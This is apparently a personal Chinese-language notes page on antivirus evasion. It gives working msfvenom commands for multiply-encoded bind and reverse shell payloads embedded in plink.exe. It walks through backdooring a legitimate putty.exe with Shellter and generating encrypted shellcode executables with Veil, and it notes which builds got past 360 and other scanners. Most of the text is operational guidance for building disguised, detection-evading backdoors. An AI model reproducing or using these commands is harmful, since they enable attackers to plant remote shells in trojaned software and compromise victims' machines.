免杀相关
¶免杀技术
1.修改二进制文件中的特征字符
- 替换、修改、删除
2.加密技术
- 通过加密手段使得特征字符不可读,从而逃避杀毒软件检测
- 运行时分片分段解密执行,注入进程或者杀毒软件不检查的无害软件中
3.防病毒软件的检测
- 恶意程序本身的特征字符
- 加密器的特征字符
4.在线多引擎查杀网站 - http://www.virscan.org
- https://nodistribute.com/
- http://viruscheckmate.com/check/
- http://www.virustotal.com
¶msf生成payload
1.加密编码
- msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -f raw -e x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/ countdown -i 9 -f raw | msfvenom -a x86 --platform windows -e x86/ shikata_ga_nai -i 11 -b ‘\x00’ -f exe -o a.exe
效果不是很好
2.利用模版隐藏shell
- msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe
- 用模版并且编码
msfvenom -p windows/shell/bind_tcp -x /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 – platform win -f exe > b.exe
居然只有一个报毒,并且过了360 不可思议
¶shellter
Shellter采用了动态Shellcode注入来实现免杀的效果,当用户打开被植入后门的软件时,只有触发一定的操作才会启动后门。它是生成一个dll文件再将其注入到任意一个文件中运行。
安装shellter
apt-get install shellter
shellter需要注入到一个正常的程序中所以下载一个正常的putty.exe
wget https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe
选择putty.exe的路径
选择Y隐蔽模式 选择payload
看看免杀效果
¶Veil
安装过程遇到了很多坑,另外再阐述
经过不懈的努力终于在kali上安装成功
use 1 #进入Evasion框架
list #查看可用payload
use 29 #选择python/shellcode_inject/aes_encrypt.py进行测试
options #查看参数
set USE_PYHERION Y #使用Herion加密器加密 效果很好
generate #生成shellcode
2 #选择我们熟悉的msfvenom来生成payload
#填写lhost和lport
用pyinstaller来生产exe
在/var/lib/veil/output/compiled/291.exe找到生成的可执行文件查看免杀效果
9/49 效果很好 ,并且过了360